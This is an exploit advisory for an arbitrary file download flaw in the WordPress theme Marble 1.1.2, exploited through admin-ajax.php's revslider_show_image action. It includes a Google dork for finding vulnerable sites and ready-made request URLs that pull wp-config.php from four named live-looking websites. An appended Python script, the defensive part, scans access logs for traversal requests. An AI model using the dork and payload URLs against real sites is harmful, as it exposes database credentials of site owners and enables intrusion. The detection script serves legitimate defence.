
WordPress Theme Marble Arbitrary File Download Vulnerability

Author: Hamza HD, Published: 22-11-2014
Exploit Author : Hamza HD

Date : 20/11/2014

Vendor Homepage : http://themeforest.net/item/marble-flat-responsive-creative-wordpress-theme/5896650

Version: 1.1.2

Google Dork : inurl:"/wp-content/themes/marble/"

Tested on : Linux, Windows 7

--------------------------------------------------------------

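The WordPress theme Marble suffers from an arbitrary file download vulnerability. The revslider_show_image action of admin-ajax.php serves the file named in its img parameter, so a relative path such as ../wp-config.php is returned to the requester.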

Exploit : http://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=[LFD]

Demo Sites :

http://caiomendes.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://cosmeticsurgerywv.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://prod-uct.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
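
To check a site's own access logs for the request pattern shown above, the following added example (not part of the original advisory) flags revslider_show_image requests whose img value is not a plain image path. The function names, the extension list and the sample log lines are assumptions made for illustration; it assumes combined-format logs and that legitimate img values are relative paths to image files.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate img values are relative paths to image files.
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif", ".webp", ".bmp")
# Request line of a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_img(value):
    """Return why an img value is suspicious, or None for a plain image path."""
    v = value.replace("\\", "/").lower()
    if ".." in v.split("/"):
        return "path traversal"
    if v.startswith("/"):
        return "absolute path"
    if not v.endswith(IMAGE_EXT):
        return "non-image file"
    return None

def scan(lines):
    """Yield (client_ip, img, reason) for suspicious revslider_show_image requests."""
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        qs = parse_qs(url.query)  # parse_qs percent-decodes each value once
        if "revslider_show_image" not in qs.get("action", []):
            continue
        for img in qs.get("img", []):
            reason = suspicious_img(img)
            if reason:
                yield line.split()[0], img, reason

# Constructed sample log lines (documentation IP ranges), not real traffic.
_REQ = "/wp-admin/admin-ajax.php?action=revslider_show_image&img="
SAMPLE_LOG = [
    f'203.0.113.7 - - [22/Nov/2014:10:01:02 +0000] "GET {_REQ}../wp-config.php HTTP/1.1" 200 3021',
    f'198.51.100.4 - - [22/Nov/2014:10:01:09 +0000] "GET {_REQ}uploads/2014/10/banner.jpg HTTP/1.1" 200 48211',
    f'203.0.113.9 - - [22/Nov/2014:10:02:30 +0000] "GET {_REQ}%2e%2e%2fwp-config.php HTTP/1.1" 200 3021',
    '192.0.2.15 - - [22/Nov/2014:10:03:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58',
]

if __name__ == "__main__":
    for ip, img, reason in scan(SAMPLE_LOG):
        print(f"{ip}\t{reason}\t{img}")
```

Access logs record only the query string, so a request that carries action and img in a POST body is not visible to this scan and needs request-body logging or a WAF rule to catch.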
